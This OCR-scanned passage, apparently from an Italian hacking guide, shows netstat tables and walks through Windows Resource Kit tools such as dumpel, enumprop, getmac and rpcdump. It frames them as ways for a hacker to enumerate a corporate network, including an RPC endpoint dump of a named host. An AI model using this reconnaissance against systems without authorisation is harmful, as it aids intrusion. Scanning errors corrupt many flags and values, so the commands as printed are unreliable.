TCP 


WEBSITEK- 


-HOST- 


■1 


■http 


ipdial-245-238. 


info. com .ph:1788 ESTABLISHED 


TCP 


WEBSITEK- 


-HOST- 


■1 


■1026 


websitek—host—2 


. websitek 


it 


3027 


ESTABLISHED 


TCP 


WEBSITEK- 


-HOST- 


■1 


■1032 


websitek-host-2 


. websitek 


it 


1026 


ESTABLISHED 



Mediante l'apposita opzione -r è possibile vedere le tabelle di routing. 

E: \>netstat -r 
Route Table 



Interface List 

Oxl MS TCP Loopback interface 

0x2 . . .00 dO b7 c8 7f Oc Intel (R) PRO Adapter 

0x3 . . .00 50 8b 6c c4 d2 Compaq Ethernet/FastEthernet or Gigabit NIC 

0x4 . . . 00 50 8b 60 ee 2e Compaq Ethernet/FastEthernet or Gigabit NIC 



Active Routes : 

Network Destination Netmask 

0.0.0.0 0.0.0.0 

0.0.0.0 0.0.0.0 

10.10.10.0 255.255.255.0 



Gateway Interface Metric 

192.168.255.150 192.168.255.17 1 

212.210.165.129 212.210.165.131 1 
10.10.10.1 10.10.10.1 1 
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10.255.255.255 


255.255.255. 


255 


10.10.10.1 




10.10.10.1 


1 


127.0.0.0 




255 . 0 . 


0.0 


127.0.0.1 




127.0.0.1 


1 


192.168.255.0 


255.255.255.0 


192.168.255.17 


192. 


168.255.17 


1 


192.168.255.11 


255. 


255.255. 


255 


127.0.0.1 




127.0.0.1 


1 


192.168.255.255 


255. 


255.255. 


255 


192.168.255.17 


192. 


168.255.17 


1 


212 .210 .165 .128 


255. 


255.255. 


128 


212 .210 .165 .131 


212 


210 .165 .131 


1 


212.210.165.131 


255. 


255.255. 


255 


127 .0.0.1 




127.0.0.1 


1 


212.210.165.255 


255. 


255.255. 


255 


212.210.165.131 


212. 


210.165.131 


1 


224.0.0.0 




224 . 0 . 


0.0 


10.10.10.1 




10.10.10.1 


1 


224.0.0.0 




224 . 0 . 


0.0 


192.168.255.17 


192. 


168.255.17 


1 


224.0.0.0 




224.0. 


0.0 


212.210.165.131 


212. 


210.165.131 


1 


255.255.255.255 


255. 


255.255. 


255 


192.168.255.17 


192. 


168.255.17 


1 


Default Gateway: 


192. 


168.255. 


150 










Persistent Routes: 
















None 

















W indows Resource T ool Kit 

Nell'ambito della varie utilità che possono essere utilizzate per quello che riguarda la 
diagnostica di rete e per la gestione del sistema operativo Windows, c'è quello che viene 
chiamato cn il termine di Resource Kit di Windows. 

Il pacchetto viene venduto come componente a parte dalla stessa Microsoft anche se alcune 
volte questo è reperibile nell'ambito di quelli che sono i costosissimi volumi legati a Windows 
2000. 

Il tutto è costituito da un certo numero di programmi ciascuno indirizzato a qualche particolare 
gestione come ad esempio Active Directory, DHCP, DNS e cosi via. 

Dal punto di vista dell'hacker queste Utilities possono essere utilizzate per ricavare un certo 
numero di informazioni molto dettagliate nell'ambito della descrizione di quella che è la 
struttura di Windows nell'ambito di una rete aziendale. 

I programmi forniti nel resource toolkit sono alcune centinaia anche se di fatto quelle 
utilizzabili dal nostro punto di vista sono soltanto una piccola parte. 

Chiaramente quelle che ci interessano sono quelle indirizzate ad ricavare delle informazioni 
legate alla struttura del sistema. 
Vediamo la sintassi di alcune di queste. 

Dumpel.exe: Dump Event Log 

Esegue il dump del log del sistema locale o d un sistema remoto. 
Sintassi: 

dumpel -f file [-s Wserver] [-1 log [-m source]] [-e ni n2 n3...] [-r] [-t] [-d x] 
Where: 
-{file 

specifies the file name for the output file, there is no default for -f, so you must 
specify the file, 
-s server 

specifies the server for which you want to dump the event log. leading 
backslashes on the server name are optional. 

-ìlog 

specifies which log (system, application, security) to dump, if an invalid 
fognarne is specified, the application log will be dumped. 
-m source 

specifies in which source (such as rdr, serial, ...) to dump records. only one 
source can be supplied. if this switch is not used, ali events are dumped. if a 
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source is used that is not registered in the registry , the application log will be 
searched for records of this type. 
-e ni n2 n3 ... 

filters for event id nn (up to ten can be specified). if the -r switch is not used, 
only records of these types are dumped; if -r is used, ali records except records 
of these types are dumped. if this switch is not used, ali events from the 
specified sourcename are selected. you cannot use this switch without the -m 
switch. 

-r 

specifies whether to filter for specific sources or records, or to filter them out. 

-t 

specifies that individuai strings are separated by tabs. if -t is not used, strings 
are separated by spaces. 

-d x 

dumps events for the past x days. 
L'output è come segue. 

Dump Event Log Examples 

To dump the system event log on server WEVENTSVR to a file named Event.out, use: 
dumpel -f event.out -s eventsvr -1 system 

To dump the locai system event log to a file named Event.out, but only get Rdr events 
2013, use: 

dumpel -f event.out -1 system -m rdr -e 2013 

To dump the locai application log to a file named Event.out, and get ali events except 
ones from the Garbase source, use: 

dumpel -f event.out -1 application -m garbase -r 

Enumprop.exe: Enumerate Properties 

Esegue il dump di qualsiasi oggetto relativo a servizi di directory. 
Sintassi: 

enumprop [options] LDAP-PATH 
Where: 
options 

include: 
/sec 

display s only the security descriptor. 
/attr:attrl,attr2... 
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displays only these attributes. 
LDAP-PATH 

specifies the LDAP (Lightweight Directory Access Protocol) path to the 
object. 

Gli esempi d'uso : 

Example One 

c: \>enumprop "LDAP : //cn=administrator, cn=users, dc=user5, dc=com" 

LDAP://cn=administrator,cn=users,dc=user5,dc=com: 29 set properties. 

1: accountExpires : 9223372036854775807 

2 : badPasswordTlme : 0 

3: badPwdCount: 0 

4 : codePage : 0 

5: cn: Administrator 

6: country Code: 0 

7: descript ion: Built-in account for administering the 
computer/domain 
8: instanceType : 4 

9: isCriticalSystemObject: Type 6 

10 : memberOf : 

CN=Domain Admins, CN=Users, DC=user5 , DC=com 
CN=Enterprise Admins, CN=Users , DC=user5, DC=com 
CN=Schema Admins, CN=Users , DC=user5, DC=com 
CN=Administrators, CN=Builtin, DC=user5, DC=com 

11: lastLogoff: 0 

12: lastLogon: 125589045061875000 
13: logonCount: 2 

14 : n TSecuri tyDescript or : 

15 : distinguishedName : CN=Administrator, CN=Users , DC=user5, DC=com 
16: objectCategory: 

CN=Person, CN=Schema, CN=Configuration, DC=user5, DC=com 
1 7 : objectClass : 
top 

person 

organizationalPerson 
user 

18: objectGUID: { 6501886D-9A84-11D2-BC7C-00C04F82FE9D} 

19: objectSid: S-l-5-21-842925246-1454471165-682003330-500 

20: primaryGroupID : 513 

21: pwdLastSet: 125589047530625000 

22: name: Administrator 

23: sAMAccountName : Administrator 

24: sAMAccountType : 805306368 

25: user Account Control : 66048 

26: uSNChanged: 2264 

27: uSNCreated: 2113 

28: whenChanged: 23/12/1998 17:39:13 
29: whenCreated: 23/12/1998 17:27:47 
Example Two 

c:>enumprop /attr : objectguid, distinguishedname, objectsid 
"LDAP : //cn=administrator, cn=users, dc=user5, dc=com" 

LDAP : / / cn=administrator , cn=users, dc=user5 , dc=com 

1 : distinguishedName : CN=Administrator, CN=Users , DC=user5 , DC= com 
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2: objectGUID: { 6501886D-9A84-11D2-BC7C-00C04F82FE9D} 
3: objectSid: S-l-5-21-842925246-1454471165-682003330-500 
Example Three 

c ; >enumprop /sec "LDAP : / /cn=administrator , cn=users, dc=user5, dc=com " 

LDAP : //cn=administrator, cn=users, dc=user5, dc=com 

Revision : 1 
Control : 35844 

Owner: BUILTIN\Administrators 
Group: BUILTIN\Administrators 
No System ACL 
Discretionary ACL: 
AclRevision : 4 
AceCount : 7 
Ace #: 1 

Trustee: Everyone 
AccessMask : 0x130 

ADS_RIGHT_DS_READ_PROP 
ADS_RIGHT_DS_WRITE_PROP 
AceType: 0x5 

ADS_ACETYPE_ACCESS_ALLOWED_OBJECT - ? 
AceFlags : 0x0 
Flags : Oxl 

ACE_OBJECT_TYPE_PRESENT - The ObjectType member contains a 

GUID 

ObjectType: {AB721A53-1E2F-11D0-9819-00AA0040529B} 

Control: Change Password 
Intieri tedObject Type : NULL 
Ace #; 2 

Trustee: NT AUTHORITY\Authenticated Users 
AccessMask : Oxl 0 

ADS_RIGHT_DS_READ_PROP 
AceType: 0x0 

ADS_ACETYPE_ACCESS_ALLOWED - Allows Trustee access 
AceFlags : 0x0 
Flags : 0x0 
ObjectType: NULL 
Intieri tedObject Type : NULL 
Ace #; 3 

Trustee: NT AUTHORITY\Authenticated Users 
AccessMask: 0x20028 

ADS_RIGHT_READ_ CONTROL 

ADS_RIGHT_DS_ SELF 

ADS_RIGHT_ DS_ WRITE_PROP 
AceType: 0x5 

ADS_ACETYPE_ACCESS_ALLOWED_OBJECT - ? 
AceFlags : 0x0 
Flags : Oxl 

ACE_OBJECT_TYPE_PRESENT - The ObjectType member contains a 

GUID 

ObjectType : {BC0AC240-79A9-11D0-9020-00C04FC2D4CF} 

Control : Modify Group Membership 
Inheri tedObject Type : NULL 
Ace #; 4 

Trustee: BUILTIN\Administrators 
AccessMask : OxfOlff 

ADS_RIGHT_DELETE 

ADS_RIGHT_READ_ CONTROL 

ADS_RIGHT_ WRITE_DAC 
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ADS_RIGHT_WRITE_OWNER 
ADS_RIGHT_DS_ CREATE_ CHILD 
ADS_RIGHT_DS_DELETE_ CHILD 
ADS_RIGHT_ACTRL_DS_LIST 
ADS_RIGHT_DS_ SELF 
ADS_RIGHT_DS_READ_PROP 
ADS_RIGHT_DS_ WRITE_PROP 
ADS_RIGHT_DS_DELETE_ TREE 
ADS_RIGHT_DS_LIST_OBJECT 
AceType: 0x0 

ADS_ACETYPE_ACCESS_ALLOWED - Allows Trustee access 
AceFlags : 0x0 
Flags: 0x0 
ObjectType: NULL 
Intieri tedObject Type : NULL 
Ace #; 5 

Trustee: NT AUTHORITY \ SELF 
AccessMask: 0x130 

ADS_RIGHT_DS_READ_PROP 

ADS_RIGHT_DS_ WRITE_PROP 
AceType: 0x5 

ADS_ACETYPE_ACCESS_ALLOWED_OBJECT - ? 
AceFlags : 0x0 
Flags : Oxl 

ACE_OBJECT_TYPE_PRESENT - The ObjectType member contains a 

GUID 

ObjectType: {AB721A53-1E2F-11D0-9819-00AA0040529B} 

Control : Change Password 
Intieri tedObject Type : NULL 
Ace #; 6 

Trustee: NT AUTHORITY \SELF 
AccessMask : Oxl 0 

ADS_RIGHT_DS_READ_PROP 
AceType: 0x0 

ADS_ACETYPE_ACCESS_ALLOWED - Allows Trustee access 
AceFlags : 0x0 
Flags : 0x0 
ObjectType: NULL 
Intieri tedObject Type : NULL 
Ace #; 7 

Trustee: USER5\Enterprise Admins 
AccessMask: OxfOlfd 

ADS_RIGHT_DELETE 

ADS_RIGHT_READ_ CONTROL 

ADS_RIGHT_WRITE_DAC 

ADS_RIGHT_WRITE_OWNER 

ADS_RIGHT_DS_ CREATE_ CHILD 

ADS_RIGHT_ACTRL_DS_LIST 

ADS_RIGHT_DS_ SELF 

ADS_RIGHT_DS_READ_PROP 

ADS_RIGHT_DS_ WRITE_PROP 

ADS_RIGHT_DS_DELETE_ TREE 

ADS_RIGHT_DS_LIST_OBJECT 
AceType: 0x0 

ADS_ACETYPE_ACCESS_ALLOWED - Allows Trustee access 
AceFlags: 0x13 

ADS_ACEFLAG_ INHERIT_ACE - Child container objects inherit 
ace, inherited unless NO_PROPAGATE_INHERIT_ACE is set 
ADS_ACEFLAG_VALID_INHERIT_FLAGS - 

ADS_ACEFLAG_INHERITED_ACE - This ACE was inherited 
Flags : 0x0 
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ObjectType: NULL 
Intieri tedObject Type : NULL 
Getmac.exe: GetMAC 

Restituisci l'indirizzo MAC di un sistema locale o sulla rete. 
Sintassi: 

getmac [Wcomputername] [computername.domain.com] 
Where: 

Wcomputername 

is the NetBIOS name of a computer accessible across a network (including via 
RAS) . 

computername. domain, com 

is the DNS name of a computer accessible across a network (including via 
RAS) 

C: \>getmac \ \host 
returns the following information: 
Information for machine \ \host 
Transport Address Transport Name 



00-00-1B-16-78-76 \Device \NetBT_NE32007 

00-00-1B-16-78-76 \Device\NwlnkNb 

00-00-00-00-00-00 \Device \NetBT_NdisWan5 

52-41-53-48-00-01 \Device \Nbf_NdisWan4 

52-41-53-48-00-04 \Device \Nbf_NdisWan8 

00-00-1B-16-78-76 \Device\Nbf_NE32007 

In this example: 

00-00- lb- 16-78-76 is the address of an NE3200 Ethernet card. 

00-00-00-00-00-00, 52-41-53-48-00-01, and 52-41-53-48-00-04 are RAS addresses. 

When attempting a connection to a remote computer over the network, the 
workstation service will use the following order: 
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NetBT (TCP/IP) over the NE3200 

NwlinkNb (IPX) over the NE3200 

NetBT over one of the RAS links 

Nbf ( NetBIOS ) over two other remote access server links 

Nbf over the NE3200 

lasparse.exe: IAS Parse Tool 

Esegue il parsing del Internet Authentication Service (IAS) e remote access server logs e 
converte in un formato leggibile. 

Sintassi: 



iasparse [-i'.filename] [-p] [-v] [-?] 

Where: 
-i'.filename 

parses the file filename. By default, IasParse parses the file 
% windir %\sy stem3 2Uogf ile s\iaslog .log 

-P 

sends output directly to display. Sets the log file directory in the IAS snap-in 
to WApipe. 

-v 

displays the description associated with attributes in the log file. 
For example, for this attribute: 
Client-Vendor : VENDOR 
it shows this description: 

Manufacturer of RADIUS proxy or NAS . (IAS only) 

.9 

displays a syntax screen at the command prompt. 



IasParse Examples 

IAS Format 

Iasparse -f-.iaslog.log 

The line logged into the file: 

172.31. 230 .187, rajeshp, 02/09/2000, 23:18 : 00, IAS, RA 

JESHP2, 6,2, 7,1,5,11, 61,5, 64,1, 65,1,31,172.31.225.108, 66, 172 . 31 . 225 . 10 
8, 4108,172. 

31.230.187, 4116, 9, 4128 , rajeshp3 , 4147, 311, 4148 ,MSRASV5 . 00, 4129, RAJESHP 
2\rajeshp, 4136, 1, 4142, 0 



NAS_IP_Address 


: 172.31.230.187 


User_Name 


rajeshp 


Record_Date 


02/09/2000 


Record_ Time 


23:18:00 
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Servi ce_Name 


IAS 


Computer_Name 


RAJESHP 2 


Service- Type 


Framed 


Framed-Prot ocol 


PPP 


NAS-Port 


11 


NAS-Port -Type 


Virtual 


Tunnel-Type 


PPTP 


Tunnel -Medi um-Type 


IP 


Calling-Station-Id 


172.31.225.108 


Tunnel -Client -Endpt 


172.31.225.108 


Client-IP -Addre s s 


172.31.230.187 


Client-Vendor 


VENDOR 


Client -Fri en dly-Name 


rajeshp3 


MS-RAS-Vendor 


Microsoft 


MS-RAS-Version 


MSRASV5 . 00 


SAM-Account -Name 


RAJESHP2\rajeshp 


Packet-Type 


Access-Request 


Reason-Code 


The operation completed success fully . 


The line logged into the file: 


172.31. 230 .187, rajeshp, 02/09/2000, 23:18 : 00, IAS, RA 


JESHP2, 4130, RAJESHP2 \rajeshp, 4129, RAJESHP2\rajeshp, 4128, rajeshp3, 4116 


,9,4108,172.31.230.187,4136,3,4142,16 


NAS_IP_Address 


172.31.230.187 


User_Name 


rajeshp 


Record_Date 


02/09/2000 


Record_ Time 


23:18:00 


Servi ce_Name 


IAS 


Computer_Name 


RAJESHP 2 


Fui ly-Quali fed-User-Name : RAJESHP2 \ rajeshp 


SAM-Account -Name 


■ RAJESHP2\rajeshp 


Client -Fri en dly-Name 


■ rajeshp3 


Client-Vendor 


VENDOR 


Client-IP-Address 


172.31.230.187 


Packet-Type 


Access-Re ject 


Reason-Code 


• Authentication f allure: unknown user name or 


bad password 




ODBC-Compatible Format 




iasparse 




The line logged into the file: 


"RAJESHP 3 " , "IAS", 05/17/1999, 15:31:11, 4, "rajeshp" 


, , "172.31.225.108", , "20 .20 .20 .3" , , "172 . 31 . 230 . 187" , 11, 9, "172.31.230.1 


87", "rajes 




p3 ", 4294967295, 5, ,1,2, 


,,0,"311 1 172.31.230.18 7 05/17/1999 1 7:13:09 


3",, 1200,,, 




,0,318,370, "14", 1,0, 13, 13, , "37", "0x00000001" ,, 1, 1, "172 .31 .225 .108" ,, , 


, , , , , "MSRASV5 . 00", 311, 


/ / / 


Computer_Name 


"RAJESHP3 " 


Servi ce_Name 


"IAS " 


Record_Date 


05/17/1999 


Record_ Time 


15:31:11 


Packet-Type 


Account ing-Request 


User-Name 


"rajeshp " 


Fui ly-Quali fed-User-Name : 


Cali ed-Stati on -Id 




Calling-Station-Id 


"172.31.225.108" 


Callback-Number 
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Frante d-IP -Addre s s 


"20.20.20.3" 


NAS-Identifier 




NAS-IP-Address 


"172.31.230.187" 


NAS-Port 


11 


Client-Vendor 


VENDOR 


Client-IP -Addre s s 


"172.31.230 .187" 


Client -Fri en dly-Name 


"rajeshp3 " 


Port-Limit 


4294967295 


NAS-Port -Type 


Virtual 


Connect -Info 




Framed-Prot ocol 


PPP 


Service- Type 


Framed 


Authentication-Type 


Unknown 


NP-Policy-Name 




Reason-Code 


The operation completed 


success fully . 




Class 


"311 1 172.31.230 .187 


05/17/1999 17:13:09 3" 


Session-Timeout 




Idle-Timeout 


1200 


Termination-Action 




EAP -Fri en dly-Name 




Acct-Status-Type 


Start 


Acct -Delay-Time 


0 


Acct -Input -Octets 


318 


Acct -Output -Octets 


370 


Acct -Session -Id 


"14" 


Acct-Authentic 


Radius 


Acct -Sessi on-Time 


0 


Acct-Input-Packets 


13 


Acct-Output-Packets : 


13 


Acct-Terminate-Cause : 


Unknown 


Acct-Multi-Ssn-Id 


"3 7 " 


Acct-Link-Count 


"0x00000001 " 


Acct-Interim-Interval 




Tunnel -Type 


PPTP 


Tunnel -Medi um-Type 


IP 


Tunn el-Client -En dpt 


"172.31.225.108" 


Tunnel -Server-Endpt 




Acct -Tunnel -Conn 




Tunnel -Pvt -Group-ID 




Tunnel -Assignment-ID 




Tunnel -Preference 




MS-Acct -Auth-Type 




MS-Acct —EAP— Type 




MS-RAS-Versi on 


"MSRASV5. 00" 


MS-RAS-Vendor 


Microsoft 


MS-CHAP-Error 




MS-CHAP -Domain 




MS-MPPE-Encryption-Types : 


MS-MPPE-En crypt i on -Policy : 



RPC Ping: RPC Connectivity Verification Tool 



Verifica del sistema RPC per la connettività. 
Sintassi: 

rpings [-p ProtocolSequence] 
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ProtocolSequence 

is the friendly name for one of the supported transport mechanisms of RPC, as 
follows: 

Friendly Description 
Name 

namedpipes NCA connection over Named Pipes 
(ncacn_np) 

tcpip NCA connection over TCP/IP 

(ncacn_ip_tcp) 

netbios NCA connection over NetBIOS on 

NetBEUI (ncacn_nb_nb) 

ipx/spx NCA connection over SPX (ncacn_spx) 

vines NCA connection over Banyan Vines 

(ncacn_vns_spp) 

Rpingc and Rpingc16 Options 

Exchange Server: The name of the Exchange Server to ping 
Protocol Sequence: The following options are available: 
Any (default) 
Named Pipes 

ipx/spx 

TCP/IP 

NetBIOS 

Vines 

End Point: The following End Points on the Exchange Server are available: 

RPing (default, ali) 

Store (the Exchange Store) 

Admin (the Exchange Administrator) 

Number of Pings: Continuous 

Stop at 
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Mode: Ping Only (character echoed by Rpings) 

End Point Search (enumerates ali endpoints available) 

Run with Security (verifies that authenticated RPCs work) 

Rpcdump.exe: RPC Dump 

Esegue il dump delle informazioni RPC. 
Sintassi: 



rpcdump [/s] [/v] [/i] [/p protocol] [-?] 

Where: 

/s 

specifies the name of server to interrogate. Defaults to locai if not specified. 

/v 

runs in verbose mode. 

li 

pings ali registered endpoints to determine if the service that registered the 
endpoint is listening. 



Note 



This can take a while over slow network links. RPC Dump is multi-threaded to 
help with performance in this area. A status bar displays the progress. 

/p protocol 

is the name for one of the supported transport mechanisms of RPC . The 
default is ncacn_ip_tcp. Valid protocols include the follo wing: 



ncacn_np 
ncacn_mq 
ncadg_ipx 
ncacn_spx 

ncacn_http 

ncacn_nb_nb 

ncacn_nb_tcp 

ncacn_nb_ipx 

ncacn_ip_tcp 

ncacn_at_dsp 



Connection-oriented named pipes 

Datagram connectionless over the Message Queuing server 
Datagram connectionless IPX 
Connection-oriented SPX 

Connection-oriented TCP/IP using Microsoft Internet 
Information Services as HTTP proxy. 

Connection-oriented NetBEUI 

Connection-oriented NetBIOS over TCP 

Connection-oriented NetBIOS over IPX 

Connection-oriented TCP/IP 

AppleTalk DSP 
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ncadg_ip_udp Datagram connectionless UDP/IP 
ncacn_vns_spp Connection- oriented Vines SPP transport 
ncacn_dnet_nsp Connection- oriented DECnet transport 
ncacn_nb_xns Connection-oriented XNS 

displays a command-line syntax screen. 



RPC Dump Example 

In this example, a client is unable to start mail because it cannot connect to the server. 
You can run RPC Dump on the Microsoft® Exchange server to verify that the proper 
services (such as directory and store) are registered and responding to RPC calls. 

In the sample output, the Exchange server has registered its endpoints and is listening 
for RPC calls. 



rpcdump /s reskit /i 



ncacn_ip_tcp (Connection-oriented TCP/IP) 

172.30.5. 86 [1526] [f5cc59b4-4264-101a-8c59- 
Exchange Directory DRS Interface : YES 

172.30.5. 86 [1526] [f5cc5a 7c-4264-101a-8c59- 
Exchange Directory XDS Interface : YES 

172.30.5. 86 [1526] [f5cc5al8-4264-101a-8c59- 
Exchange Directory NSP Interface :YES 

172.30.5. 86 [1544] [a4fldb00-ca47-1067-b31f- 
Server STORE EMSMDB Interface :YES 

172.30.5.86[1544] [a4fldb00-ca47-1067-b31e- 
Server STORE ADMIN Interface :YES 

172.30.5. 86 [1544] [89742ace-a9ed-llcf-9c0c- 
Server STORE ADMIN Interface :YES 

172.30.5. 86 [1544] [99e64010-b032-lld0-97a4- 
Server STORE ADMIN Interface :YES 



08002b2f8426] 
08002b2f8426] 
08002b2f8426] 
00dd010662da] 
00dd010662da] 
08002be7ae86] 
00c04fd6551d] 



MS 
MS 
MS 

Exchange 
Exchange 
Exchange 
Exchange 



Notice that some endpoints might not have a friendly name or annotation. It is up to 
the service that registers the endpoint to fili in this field. 



In verbose mode, additional information is displayed such as version and 
ComTimeOut Value . 

rpcdump /s reskit /i /v 

ProtSeq : n ca cn_np 

Endpoint: \pipe\0000011C . 001 

NetOpt : 

Annotation -.Exchange Server STORE ADMIN Interface 
IsListening: YES 

StringBinding:ncacn_np: \ \ \ \RESKIT[\\pipe\\0000011C. 001] 
UUID : a4fldb00-ca4 7-1067-b31e-00dd010662da 
ComTimeOutValue : RPC_C_BINDING_DEFAULT_TIMEOUT 
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D:\Programmi\Resource Pro Klt>rpcdump 
RPCDump : Rpc endpoint diagnostic utility. 



/S 

not specified 
) 

/v 

/I 
/p 



Name of server to interogate. (Defaults to locai if 



Verbose Mode. 

Ping ali registered endpoints . 
Protocol : (default ncacn_ip_tcp) 

ncacn_np (Connection-or iented named pipes) 
ncacn_mq (Datagram (connectionless) over the 

Microsoft M 

essage Queue Server) 

ncadg_ipx (Datagram (connectionless) IPX) 
ncacn_spx (Connection-oriented SPX) 
ncacn_http (Connection-oriented TCP/IP using 

Microsoft I 

nternet Information Server as HTTP proxy.) 

ncacn_nb_nb (Connection-oriented NetBEUI) 
ncacn_nb_tcp (Connection-oriented NetBIOS 



over TCP) 
over IPX) 

UDP/IP) 

transport) 

transport) 



ncacn_nb_ipx (Connection-oriented NetBIOS 

ncacn_ip_tcp (Connection-oriented TCP/IP) 
ncacn_at_dsp (AppleTalk DSP) 
ncadg_ip_udp (Datagram (connectionless) 

ncacn_vns_spp (Connection-oriented Vines SPP 

ncacn_dnet_nsp (Connection-oriented DECnet 

ncacn_nb_xns (Connection-oriented XNS) 



e.g. rpcdump /s foo /v /i 



D:\Programmi\Resource Pro Kit>rpcdump /S websitek—host—1 . websitek . it /P:ncacn_±p 
_tcp 

Querying Endpoint Mapper Database . . . 
99 registered endpoints found. 

ncacn^http (Connection— oriented TCP/IP using Microsoft Internet Information Serve 
ras HTTP proxy . ) 

192.168. 255 . 17 [1029] [12345678-1234-abcd-ef00-01234567cffb] :NOT__PINGED 
10.10. 10.1 [1029] [12345678-1234-abcd-ef00-01234567cffb] :NOT_PINGED 
212.210.165.131 [1029] [12345678-1234-abcd-ef00-01234567cffb] :NOT_PINGED 
192. 168. 255. 17 [1029] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory NS 

P Interface :NOT_PINGED 

10. 10. 10.1 [1029] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory NSP In 

ter face :NOT_PINGED 

212. 210. 165. 131 [1029] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory N 
SP Interface : NOT_PINGED 

192. 168. 255. 17 [1029] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory XD 
S Interface : NOT_PINGED 

10. 10. 10.1 [1029] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory XDS In 
ter face :NOT_PINGED 

212. 210. 165. 131 [1029] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory X 
DS Interface : NOT_PINGED 

192 .168 .255 .17 [1029] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory DR 
S Interface : NOT_PINGED 

10. 10. 10.1 [1029] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory DRS In 
ter face : NOT_PINGED 

212 . 210 . 165 . 131 [1029] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory D 
RS Interface : NOT_PINGED 
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ncacniptcp (Connection— oriented TCP/IP) 

192.168. 255 .17 [1163] [50abc2a4-574d-40b3-9d66-ee4fd5fba076] :NOT__PINGED 
10.10.10.1[1163] [50abc2a4-574d-40b3-9d66-ee4fd5fba076] :NOT_PINGED 
212.210.165.131 [1163] [50abc2a4-574d-40b3-9d66-ee4fd5fba076] :NOT_PINGED 
192.168. 255 .17 [1162] [8cfb5d70-31a4-llcf-a7d8-00805f48al35] :NOT_PINGED 
10. 10. 10.1 [1162] [8cfb5d70-31a4-llcf-a7d8-00805f48al35] :NOT_PINGED 
212.210.165.131 [1162] [8cfb5d70-31a4-llcf-a7d8-00805f48al35] :NOT_PINGED 
192.168. 255 .17 [1162] [82ad4280-036b-llcf-972c-00aa006887b0] :NOT_PINGED 
10 .10 .10 .1 [1162] [82ad4280-036b-llcf-972c-00aa006887b0] :NOT__PINGED 
212.210.165.131 [1162] [82ad4280-036b-llcf-972c-00aa006887b0] :NOT__PINGED 
192. 168. 255. 17 [1141] [130ceefb-e466-lldl-b78b-00c04fa32883] NTDS ISM IP Transp 

ort :NOT_PINGED 

10 .10 .10 .1 [1141] [130ceefb-e466-lldl-b78b-00c04fa32883] NTDS ISM IP Transport 
:NOT_PINGED 

212. 210. 165. 131 [1141] [130ceefb-e466-lldl-b78b-00c04fa32883] NTDS ISM IP Trans 
port : NOT_PINGED 

192. 168. 255. 17 [1114] [a00c021c-2be2-lld2-b67 8-0000 f 87 a8f8e] PERFMON SERVICE :N 
OT_PINGED 

10. 10. 10.1 [1114] [a00c021c-2be2-lld2-b678-0000f87a8f8e] PERFMON SERVICE :NOT_P 
INGED 

212. 210. 165. 131 [1114] [a00c021c-2be2-lld2-b678-0000f87a8f8e] PERFMON SERVICE : 
NOT_PINGED 

192. 168. 255. 17 [1114] [d049bl86-814f-lldl-9a3c-00c04fc9b232] NtFrs API :NOT_PIN 
GED 

10. 10. 10.1 [1114] [d049bl86-814f-lldl-9a3c-00c04fc9b232] NtFrs API : NOT_P INGED 
212. 210. 165. 131 [1114] [d049bl86-814f-lldl-9a3c-00c04fc9b232] NtFrs API :NOT_PI 
NGED 

192. 168. 255. 17 [1114] [f5cc59b4-4264-101a-8c59-08002b2f8426] NtFrs Service :NOT 
_PINGED 

10 .10 .10 .1 [1114] [f5cc59b4-4264-101a-8c59-08002b2f8426] NtFrs Service :NOT_PIN 
GED 

212. 210. 165. 131 [1114] [f5cc59b4-4264-101a-8c59-08002b2f8426] NtFrs Service :NO 
T_PINGED 

192.168. 255 .17 [1108] [4dalc422-943d-lldl-acae-00c04fc2aa3f] :NOT__PINGED 
10.10.10.1 [1108] [4dalc422-943d-lldl-acae-00c04fc2aa3f] : NOT__P INGED 
212.210.165.131 [1108] [4dalc422-943d-lldl-acae-00c04fc2aa3f] : NOT_P INGED 
192.168. 255 . 17 [1026] [12345678-1234-abcd-ef00-01234567cffb] :NOT__PINGED 
10.10. 10.1 [1026] [12345678-1234-abcd-ef00-01234567cffb] : NOT_P INGED 
212.210.165.131 [1026] [12345678-1234-abcd-ef00-01234567cffb] : NOT_P INGED 
192 .168 .255 .17 [1026] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory NS 

P Interface : NOT_P INGED 

10 .10 .10 .1 [1026] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory NSP In 

ter face :NOT_P INGED 

212. 210. 165. 131 [1026] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory N 
SP Interface : NOT_P INGED 

192 .168 .255 .17 [1026] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory XD 
S Interface : NOT_P INGED 

10. 10. 10.1 [1026] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory XDS In 
ter face :NOT_P INGED 

212. 210. 165. 131 [1026] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory X 
DS Interface : NOT_P INGED 

192. 168. 255. 17 [1026] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory DR 
S Interface : NOT_P INGED 

10. 10. 10.1 [1026] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory DRS In 
ter face :NOT_PINGED 

212. 210. 165. 131 [1026] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory D 
RS Interface :NOT_P INGED 

ncalrpc (Locai Rpc) 

[OLEa] [6el7aaa0-la47-lldl-98bd-0000f875292e] Microsoft JoinVersion Interface 
:NOT_P INGED 

[OLEa] [ffe561b8-bfl5-llcf-8c5e-08002bb49649] Microsoft Extrocluster Interface 
:NOT_P INGED 

[OLEa] [b97db8b2-4c63-llcf-bff6-08002be23f2f] Microsoft Cluster Server API :N0 
T_PINGED 

[SMTPSVC_LPC] [8cfb5d70-31a4-llcf-a7d8-00805f48al35] : NOT_P INGED 
[INETINFO_LPC] [8cfb5d70-31a4-llcf-a7d8-00805f48al35] : NOT_PINGED 
[0LE6] [8cfb5d70-31a4-llcf-a7d8-00805f48al35] : NOT_P INGED 
